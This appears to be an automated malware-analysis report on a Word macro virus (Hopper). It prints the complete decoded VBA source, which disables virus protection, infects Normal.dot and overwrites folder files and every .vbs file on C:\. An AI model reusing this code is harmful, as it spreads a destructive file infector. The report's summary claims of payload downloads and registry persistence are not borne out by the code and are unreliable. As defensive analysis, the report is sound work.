Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bfd017daa04f1430…

MALICIOUS

Office (OLE)

36.5 KB Created: 1999-01-01 14:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: eda57447db65359cbc1af2cf4784bc58 SHA-1: 7e2582038f4d72fba04523e200b4302eaf875048 SHA-256: bfd017daa04f1430431551f60599e657600d1c3f5a6f51a064df117957e954fc
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize `WScript.Shell` and `CreateObject` to copy the current document to other files within the same directory. It then attempts to establish persistence by writing to the Normal.dot template and potentially the registry, indicated by the `WScript.Shell` usage and the 'Clipboard command execution lure' heuristic. The script's intent is to download and execute a secondary payload, as suggested by the use of `Wscript.CreateObject("Wscript.Shell")` and file copying mechanisms.

Heuristics 6

  • ClamAV: Doc.Trojan.Hopper-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-13
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
            N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
            N.InsertLines 64, "parent = Wscript.ScriptFullName"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            End If
            Set FSO = CreateObject("Scripting.FileSystemObject")
            N.InsertLines 59, ""
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3120 bytes
SHA-256: ac2525880754727594b3810c7bcc9c62f48a8d1426f38b6d1552b8f81a991de9
Detection
ClamAV: Doc.Trojan.Hopper-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'1nternal
On Error GoTo Break
        Set A = ActiveDocument.VBProject.VBComponents(1).CodeModule
        Set N = NormalTemplate.VBProject.VBComponents(1).CodeModule
        Options.VirusProtection = False
        Options.ConfirmConversions = False
        Options.SaveNormalPrompt = False
        If N.Lines(2, 1) <> "'1nternal" Then
                For i = 1 To 58
                        N.InsertLines i, A.Lines(i, 1)
                Next
        End If
        If A.Lines(2, 1) <> "'1nternal" Then
                For i = 1 To 58
                        A.InsertLines i, N.Lines(i, 1)
                Next
        End If
        Set FSO = CreateObject("Scripting.FileSystemObject")
        N.InsertLines 59, ""
        N.InsertLines 60, "On Error Resume Next"
        N.InsertLines 61, "Dim WordObj, FSO, WshShell"
        N.InsertLines 62, "Set FSO = CreateObject(" + Chr(34) + "Scripting.FileSystemObject" + Chr(34) + ")"
        N.InsertLines 63, "Set WshShell = Wscript.CreateObject(" + Chr(34) + "Wscript.Shell" + Chr(34) + ")"
        N.InsertLines 64, "parent = Wscript.ScriptFullName"
        N.InsertLines 65, "vPath = Left(parent, InStrRev(parent, " + Chr(34) + "\" + Chr(34) + "))"
        N.InsertLines 66, "For Each target in FSO.GetFolder(vPath).Files"
        N.InsertLines 67, "    FSO.CopyFile parent, target.Name, 1"
        N.InsertLines 68, "Next"
        N.InsertLines 69, "Set WordObj = CreateObject(" + Chr(34) + "Word.Application" + Chr(34) + ")"
        N.InsertLines 70, "WordObj.Options.SaveNormalPrompt = False"
        N.InsertLines 71, "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule"
        N.InsertLines 72, "If NT.Lines(2,1) <> " + Chr(34) + "'1nternal" + Chr(34) + " Then"
        N.InsertLines 73, "     NT.AddfromFile Wscript.ScriptFullName"
        N.InsertLines 74, "     NT.ReplaceLine 3, " + Chr(34) + "On Error Goto Break" + Chr(34)
        N.InsertLines 75, "     NT.DeleteLines 58, 19"
        N.InsertLines 76, "End If"
        N.InsertLines 77, "Set NT = Nothing"
        N.InsertLines 78, "WordObj.Quit"

        Set fs = Application.FileSearch
                fs.NewSearch
                fs.LookIn = "C:\"
                fs.SearchSubFolders = True
                fs.FileName = "*.vbs"
                fs.Execute
                For i = 1 To fs.FoundFiles.Count
                        Set f = FSO.OpenTextFile(fs.FoundFiles(i), 2, True)
                        N.ReplaceLine 3, "'ReplaceIt"
                        For k = 1 To 78
                                f.Write N.Lines(k, 1) + Chr(13) + Chr(10)
                        Next
                    f.Close
                Next
        N.DeleteLines 59, 20
N.ReplaceLine 3, "On Error Goto Break"
Break:
Set NT = Nothing
WordObj.Quit